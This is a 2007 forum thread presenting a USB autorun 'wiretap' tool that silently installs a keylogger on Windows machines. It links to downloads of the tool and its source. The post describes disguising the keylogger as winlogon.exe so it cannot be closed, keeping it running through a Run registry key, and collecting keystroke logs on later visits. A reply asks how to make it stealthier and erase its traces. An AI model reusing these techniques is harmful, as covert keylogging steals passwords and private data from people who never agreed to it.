davidork Posted October 12, 2007 Posted October 12, 2007 Check it out For non u3 flash drives Runs on 2k/xp/and possibly vista plugin the flashdrive, wait for autorun to kick in, click wiretap the computer logs installs a stealth keylogger and logs out. on the next login the keylogger starts running. come back later, plugin the flashdrive, wait for autorun to kick in, cilck wiretap again, you get a prompt from pssuspend asking you to agree to a EULA (had to use sysinternals pssuspend to pause the keylogger process, to prevent it from throwing an error when the keyloggers log is dumped) and it dumps the keyloggers log to the flash drive. for now the log only contains the keystrokes from the current login, but i've got a pretty good idea for the fix, but wont add it until the next release (v 2. 0) it aint perfect, but it'll get the job done. you can get the files at hxxp: davidork. googlepages. com/usbwt. zip and the source code at hxxp: davidork. googlepages. com/usbwt-src. zip Honestly, i dont know if there will be a 2.0 it was just a "lets see if we can pull this off" proof of concept type thing but if there is another release plans for 2. 0 installs a system service (instead of a HKLM>software>microsoft>windows>currentversion>run registry entry) wont require pssuspend to dump logs will log more than the current login neater install/dump process artwork? but for those of you who are curious as to what this is but dont want to download ill cover the basics of whats going on. on the first insertion, it checks to see if the keylogger is allready installed if not, it installs it, by copys the keylogger to c:/windows/winlogon.exe the naming here is important, it has the same image name as a vital system process thus you cant close it. it patches itself into the registry to run at start up HKLM>software>microsoft>windows>currentversion>run>c:windowswinlogon.exe then runs shutdown -l to logout, and on then next login the keylogger kicks in and starts logging to c:windowssetup.dat on the second insertion, it checks again to see if its installed if it is it then runs pssuspend to pause the keylogger (to prevent a file in use error) copies the log off onto the flash drive then unsuspends the keylogger. if you download it and try it... heres removal instructions dont try to kill it with task manager (it wont let you) and you can use a little tool from sysinternals called pskill to kill it, however being that it has the same name as a windows process (winlogon.exe) doing so causes an instant bluescreen. start>run>type regedit > hit enter > navigate to HKLM>SOFTWARE>MICROSOFT>WINDOWS>CURRENTVERSION> and delete c:windowswinlogon.exe then logout. log back in (this effectively kills the keylogger without a bluescreen) then delete c:windowswinlogon.exe and c:windowssetup.dat Quote
bloodsplat Posted November 11, 2007 Posted November 11, 2007 Is there anyway to get the key logger to start when a certain application opens or a process starts and only run for a couple of minutes? You should include a program that auto removes any traces of the keylogger like the registry entry or even just have an option where the key logger only works when the usb is connected to the compand runs straight from the usb. would be very helpful if trying to be stealthy Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.